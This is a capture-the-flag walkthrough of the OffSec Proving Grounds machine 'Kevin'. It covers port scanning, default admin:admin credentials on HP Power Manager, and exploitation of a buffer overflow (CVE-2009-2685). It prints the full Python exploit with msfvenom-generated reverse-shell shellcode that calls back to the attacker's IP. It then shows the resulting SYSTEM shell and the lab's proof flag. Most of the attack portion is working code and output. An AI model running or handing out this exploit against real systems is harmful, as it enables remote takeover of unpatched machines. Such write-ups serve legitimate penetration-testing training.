Kevin
Enumeration:
Port Scanning:
┌──(kali㉿kali)-[~/…/Machines/OffsecPG/Practice/Kevin]
└─$ sudo nmap -sCV -p- --min-rate 4000 -oA nmap/services -vv 192.168.115.45
Starting Nmap 7.95 ( https://nmap.org ) at 2025-11-10 01:55 EST
Nmap scan report for 192.168.115.45
Host is up, received echo-reply ttl 125 (0.12s latency).
Scanned at 2025-11-10 01:55:28 EST for 101s
Not shown: 65523 closed tcp ports (reset)
PORT STATE SERVICE REASON VERSION
80/tcp open http syn-ack ttl 125 GoAhead WebServer
| http-title: HP Power Manager
|_Requested resource was http://192.168.115.45/index.asp
| http-methods:
|_ Supported Methods: GET HEAD
|_http-server-header: GoAhead-Webs
135/tcp open msrpc syn-ack ttl 125 Microsoft Windows RPC
139/tcp open netbios-ssn syn-ack ttl 125 Microsoft Windows netbios-ssn
445/tcp open microsoft-ds syn-ack ttl 125 Windows 7 Ultimate N 7600 microsoft-ds (workgroup: WORKGROUP)
3389/tcp open tcpwrapped syn-ack ttl 125
| rdp-ntlm-info:
| Target_Name: KEVIN
| NetBIOS_Domain_Name: KEVIN
| NetBIOS_Computer_Name: KEVIN
| DNS_Domain_Name: kevin
| DNS_Computer_Name: kevin
| Product_Version: 6.1.7600
|_ System_Time: 2025-11-10T06:56:54+00:00
| ssl-cert: Subject: commonName=kevin
| Issuer: commonName=kevin
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha1WithRSAEncryption
| Not valid before: 2025-11-09T06:51:48
| Not valid after: 2026-05-11T06:51:48
| MD5: f8ca:2645:3c64:cef1:1c8c:2fc6:30de:81d6
| SHA-1: 1192:49a2:11af:b68a:5d22:8615:efff:45fb:6723:b3bd
| -----BEGIN CERTIFICATE-----
| MIICzjCCAbagAwIBAgIQI5zyqr9unpJN3uLb6MzbCzANBgkqhkiG9w0BAQUFADAQ
<snipped>
|_-----END CERTIFICATE-----
|_ssl-date: 2025-11-10T06:57:09+00:00; +1s from scanner time.
3573/tcp open tag-ups-1? syn-ack ttl 125
49152/tcp open msrpc syn-ack ttl 125 Microsoft Windows RPC
49153/tcp open msrpc syn-ack ttl 125 Microsoft Windows RPC
49154/tcp open msrpc syn-ack ttl 125 Microsoft Windows RPC
49155/tcp open msrpc syn-ack ttl 125 Microsoft Windows RPC
49158/tcp open msrpc syn-ack ttl 125 Microsoft Windows RPC
49159/tcp open msrpc syn-ack ttl 125 Microsoft Windows RPC
Service Info: Host: KEVIN; OS: Windows; CPE: cpe:/o:microsoft:windows
<snipped>HTTP (80):
Lets browse to that port:
With admin:admin, we can login successfully:
If we went to the help tab, we will find the exact version of the running service:
Exploitation:
Search for public exploits:
┌──(kali㉿kali)-[~/…/Machines/OffsecPG/Practice/Kevin]
└─$ searchsploit HP Power Manager
------------------------------------------------------------------------------------------------------------------------------------------ ---------------------------------
Exploit Title | Path
------------------------------------------------------------------------------------------------------------------------------------------ ---------------------------------
Flying Dog Software Powerslave 4.3 Portalmanager - 'sql_id' Information Disclosure | php/webapps/23163.txt
Hewlett-Packard (HP) Power Manager Administration - Remote Buffer Overflow (Metasploit) | windows/remote/16785.rb
Hewlett-Packard (HP) Power Manager Administration Power Manager Administration - Universal Buffer Overflow | windows/remote/10099.py
HP Power Manager - 'formExportDataLogs' Remote Buffer Overflow (Metasploit) | cgi/remote/18015.rb
------------------------------------------------------------------------------------------------------------------------------------------ ---------------------------------
Shellcodes: No ResultsLets try the python one:
┌──(kali㉿kali)-[~/…/Machines/OffsecPG/Practice/Kevin]
└─$ searchsploit -m windows/remote/10099.py
Exploit: Hewlett-Packard (HP) Power Manager Administration Power Manager Administration - Universal Buffer Overflow
URL: https://www.exploit-db.com/exploits/10099
Path: /usr/share/exploitdb/exploits/windows/remote/10099.py
Codes: CVE-2009-2685
Verified: True
File Type: Python script, ASCII text executable
Copied to: /home/kali/Desktop/CTF/Machines/OffsecPG/Practice/Kevin/10099.pyRead the file:
┌──(kali㉿kali)-[~/…/Machines/OffsecPG/Practice/Kevin]
└─$ cat 10099.py
<snipped>
import sys
from socket import *
print "HP Power Manager Administration Universal Buffer Overflow Exploit"
print "ryujin __A-T__ offensive-security.com"
try:
HOST = sys.argv[1]
except IndexError:
print "Usage: %s HOST" % sys.argv[0]
sys.exit()
PORT = 80
RET = "\xCF\xBC\x08\x76" # 7608BCCF JMP ESP MSVCP60.dll
# [*] Using Msf::Encoder::PexAlphaNum with final size of 709 bytes
# badchar = "\x00\x3a\x26\x3f\x25\x23\x20\x0a\x0d\x2f\x2b\x0b\x5c\x3d\x3b\x2d\x2c\x2e\x24\x25\x1a"
SHELL = (
"n00bn00b"
"\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x4f\x49\x49\x49\x49\x49"
<snipped>
"\x4f\x4f\x42\x4d\x5a")
EH ='\x33\xD2\x90\x90\x90\x42\x52\x6a'
EH +='\x02\x58\xcd\x2e\x3c\x05\x5a\x74'
EH +='\xf4\xb8\x6e\x30\x30\x62\x8b\xfa'
EH +='\xaf\x75\xea\xaf\x75\xe7\xff\xe7'
evil = "POST http://%s/goform/formLogin HTTP/1.1\r\n"
evil += "Host: %s\r\n"
evil += "User-Agent: %s\r\n"
evil += "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\n"
evil += "Accept-Language: en-us,en;q=0.5\r\n"
evil += "Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7\r\n"
evil += "Keep-Alive: 300\r\n"
evil += "Proxy-Connection: keep-alive\r\n"
evil += "Referer: http://%s/index.asp\r\n"
evil += "Content-Type: application/x-www-form-urlencoded\r\n"
evil += "Content-Length: 678\r\n\r\n"
evil += "HtmlOnly=true&Password=admin&loginButton=Submit+Login&Login=admin"
evil += "\x41"*256 + RET + "\x90"*32 + EH + "\x42"*287 + "\x0d\x0a"
evil = evil % (HOST,HOST,SHELL,HOST)
s = socket(AF_INET, SOCK_STREAM)
s.connect((HOST, PORT))
print '[+] Sending evil buffer...'
s.send(evil)
print s.recv(1024)
print "[+] Done!"
print "[*] Check your shell at %s:4444 , can take up to 1 min to spawn your shell" % HOST
s.close()The only thing we want to change here is the shellcode, to add our own IP address and local port:
┌──(kali㉿kali)-[~/…/Machines/OffsecPG/Practice/Kevin]
└─$ msfvenom -p windows/shell_reverse_tcp LHOST=192.168.45.187 LPORT=80 -b '\x00\x3a\x26\x3f\x25\x23\x20\x0a\x0d\x2f\x2b\x0b\x5c\x3d\x3b\x2d\x2c\x2e\x24\x25\x1a' -f c
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x86 from the payload
Found 11 compatible encoders
Attempting to encode payload with 1 iterations of x86/shikata_ga_nai
x86/shikata_ga_nai failed with Failed to locate a valid permutation.
Attempting to encode payload with 1 iterations of x86/call4_dword_xor
x86/call4_dword_xor succeeded with size 348 (iteration=0)
x86/call4_dword_xor chosen with final size 348
Payload size: 348 bytes
Final size of c file: 1491 bytes
unsigned char buf[] =
"\x31\xc9\x83\xe9\xaf\xe8\xff\xff\xff\xff\xc0\x5e\x81\x76"
<snipped>
"\xe3\xbd\x35\x86\x85\xca\xe1\xab\x96\xeb\x71\x14";Add that shellcode to the script:
#!/usr/bin/python
# HP Power Manager Administration Universal Buffer Overflow Exploit
# CVE 2009-2685
# Tested on Win2k3 Ent SP2 English, Win XP Sp2 English
# Matteo Memelli ryujin __A-T__ offensive-security.com
# www.offensive-security.com
# Spaghetti & Pwnsauce - 07/11/2009
#
# ryujin@bt:~$ ./hppowermanager.py 172.16.30.203
# HP Power Manager Administration Universal Buffer Overflow Exploit
# ryujin __A-T__ offensive-security.com
# [+] Sending evil buffer...
# HTTP/1.0 200 OK
# [+] Done!
# [*] Check your shell at 172.16.30.203:4444 , can take up to 1 min to spawn your shell
# ryujin@bt:~$ nc -v 172.16.30.203 4444
# 172.16.30.203: inverse host lookup failed: Unknown server error : Connection timed out
# (UNKNOWN) [172.16.30.203] 4444 (?) open
# Microsoft Windows [Version 5.2.3790]
# (C) Copyright 1985-2003 Microsoft Corp.
# C:\WINDOWS\system32>
import sys
from socket import *
print "HP Power Manager Administration Universal Buffer Overflow Exploit"
print "ryujin __A-T__ offensive-security.com"
try:
HOST = sys.argv[1]
except IndexError:
print "Usage: %s HOST" % sys.argv[0]
sys.exit()
PORT = 80
RET = "\xCF\xBC\x08\x76" # 7608BCCF JMP ESP MSVCP60.dll
# [*] Using Msf::Encoder::PexAlphaNum with final size of 709 bytes
# badchar = "\x00\x3a\x26\x3f\x25\x23\x20\x0a\x0d\x2f\x2b\x0b\x5c\x3d\x3b\x2d\x2c\x2e\x24\x25\x1a"
SHELL = (
"n00bn00b"
"\x31\xc9\x83\xe9\xaf\xe8\xff\xff\xff\xff\xc0\x5e\x81\x76"
"\x0e\x96\xb8\x8e\xc1\x83\xee\xfc\xe2\xf4\x6a\x50\x0c\xc1"
"\x96\xb8\xee\x48\x73\x89\x4e\xa5\x1d\xe8\xbe\x4a\xc4\xb4"
"\x05\x93\x82\x33\xfc\xe9\x99\x0f\xc4\xe7\xa7\x47\x22\xfd"
"\xf7\xc4\x8c\xed\xb6\x79\x41\xcc\x97\x7f\x6c\x33\xc4\xef"
"\x05\x93\x86\x33\xc4\xfd\x1d\xf4\x9f\xb9\x75\xf0\x8f\x10"
"\xc7\x33\xd7\xe1\x97\x6b\x05\x88\x8e\x5b\xb4\x88\x1d\x8c"
"\x05\xc0\x40\x89\x71\x6d\x57\x77\x83\xc0\x51\x80\x6e\xb4"
"\x60\xbb\xf3\x39\xad\xc5\xaa\xb4\x72\xe0\x05\x99\xb2\xb9"
"\x5d\xa7\x1d\xb4\xc5\x4a\xce\xa4\x8f\x12\x1d\xbc\x05\xc0"
"\x46\x31\xca\xe5\xb2\xe3\xd5\xa0\xcf\xe2\xdf\x3e\x76\xe7"
"\xd1\x9b\x1d\xaa\x65\x4c\xcb\xd0\xbd\xf3\x96\xb8\xe6\xb6"
"\xe5\x8a\xd1\x95\xfe\xf4\xf9\xe7\x91\x47\x5b\x79\x06\xb9"
"\x8e\xc1\xbf\x7c\xda\x91\xfe\x91\x0e\xaa\x96\x47\x5b\x91"
"\xc6\xe8\xde\x81\xc6\xf8\xde\xa9\x7c\xb7\x51\x21\x69\x6d"
"\x19\xab\x93\xd0\x4e\x69\xbb\x03\xe6\xc3\x96\xb8\xde\x48"
"\x70\xd2\x9e\x97\xc1\xd0\x17\x64\xe2\xd9\x71\x14\x13\x78"
"\xfa\xcd\x69\xf6\x86\xb4\x7a\xd0\x7e\x74\x34\xee\x71\x14"
"\xfe\xdb\xe3\xa5\x96\x31\x6d\x96\xc1\xef\xbf\x37\xfc\xaa"
"\xd7\x97\x74\x45\xe8\x06\xd2\x9c\xb2\xc0\x97\x35\xca\xe5"
"\x86\x7e\x8e\x85\xc2\xe8\xd8\x97\xc0\xfe\xd8\x8f\xc0\xee"
"\xdd\x97\xfe\xc1\x42\xfe\x10\x47\x5b\x48\x76\xf6\xd8\x87"
"\x69\x88\xe6\xc9\x11\xa5\xee\x3e\x43\x03\x7e\x74\x34\xee"
"\xe6\x67\x03\x05\x13\x3e\x43\x84\x88\xbd\x9c\x38\x75\x21"
"\xe3\xbd\x35\x86\x85\xca\xe1\xab\x96\xeb\x71\x14")
EH ='\x33\xD2\x90\x90\x90\x42\x52\x6a'
EH +='\x02\x58\xcd\x2e\x3c\x05\x5a\x74'
EH +='\xf4\xb8\x6e\x30\x30\x62\x8b\xfa'
EH +='\xaf\x75\xea\xaf\x75\xe7\xff\xe7'
evil = "POST http://%s/goform/formLogin HTTP/1.1\r\n"
evil += "Host: %s\r\n"
evil += "User-Agent: %s\r\n"
evil += "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\n"
evil += "Accept-Language: en-us,en;q=0.5\r\n"
evil += "Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7\r\n"
evil += "Keep-Alive: 300\r\n"
evil += "Proxy-Connection: keep-alive\r\n"
evil += "Referer: http://%s/index.asp\r\n"
evil += "Content-Type: application/x-www-form-urlencoded\r\n"
evil += "Content-Length: 678\r\n\r\n"
evil += "HtmlOnly=true&Password=admin&loginButton=Submit+Login&Login=admin"
evil += "\x41"*256 + RET + "\x90"*32 + EH + "\x42"*287 + "\x0d\x0a"
evil = evil % (HOST,HOST,SHELL,HOST)
s = socket(AF_INET, SOCK_STREAM)
s.connect((HOST, PORT))
print '[+] Sending evil buffer...'
s.send(evil)
print s.recv(1024)
print "[+] Done!"
print "[*] Check your shell at %s:4444 , can take up to 1 min to spawn your shell" % HOST
s.close()
Now lets start a netcat listener, then run the script with python2:
┌──(kali㉿kali)-[~/…/Machines/OffsecPG/Practice/Kevin]
└─$ rlwrap nc -nlvp 80
listening on [any] 80 ...┌──(kali㉿kali)-[~/…/Machines/OffsecPG/Practice/Kevin]
└─$ python2 10099.py 192.168.115.45
HP Power Manager Administration Universal Buffer Overflow Exploit
ryujin __A-T__ offensive-security.com
[+] Sending evil buffer...
HTTP/1.0 200 OK
[+] Done!
[*] Check your shell at 192.168.115.45:4444 , can take up to 1 min to spawn your shellAfter waiting a minute:
┌──(kali㉿kali)-[~/…/Machines/OffsecPG/Practice/Kevin]
└─$ rlwrap nc -nlvp 80
listening on [any] 80 ...
connect to [192.168.45.187] from (UNKNOWN) [192.168.115.45] 49205
Microsoft Windows [Version 6.1.7600]
Copyright (c) 2009 Microsoft Corporation. All rights reserved.
C:\Windows\system32>whoami
whoami
nt authority\systemHere we have a reverse shell as system.
Get the flag:
C:\Windows\system32>type C:\Users\Administrator\Desktop\proof.txt
3ca97c1c18601246670a218e277c9552Last updated